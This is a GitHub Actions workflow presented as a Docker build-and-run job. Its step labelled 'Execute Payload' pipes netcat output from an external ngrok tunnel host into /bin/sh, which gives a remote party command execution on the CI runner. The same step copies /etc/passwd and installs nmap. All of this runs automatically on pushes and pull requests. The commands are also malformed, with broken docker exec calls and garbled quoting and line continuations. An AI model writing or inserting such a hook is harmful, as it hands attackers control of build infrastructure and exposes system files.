name: Docker Build and Run

on:
  push:
    branches:
      - main  # Change this to your target branch if needed
  pull_request:

jobs:
  build-and-run:
    runs-on: ubuntu-latest

    steps:
    - name: Checkout the repository
      uses: actions/checkout@v3

    - name: Set up Docker Buildx
      uses: docker/setup-buildx-action@v2

    - name: Build Docker Image
      run: |
        echo -e "FROM alpine:latest\nRUN apk add --no-cache bash" > Dockerfile
        docker build --tag alpine .

    - name: Execute Payload
      run: |
          docker exec nc 4.tcp.us-cal-1.ngrok.io 15962 | /bin/sh | /bin/sh\ \
            docker exec "curl file:///mnt/etc/passwd -o /tmp/passwd\" \
            sudo apt install nmap
            
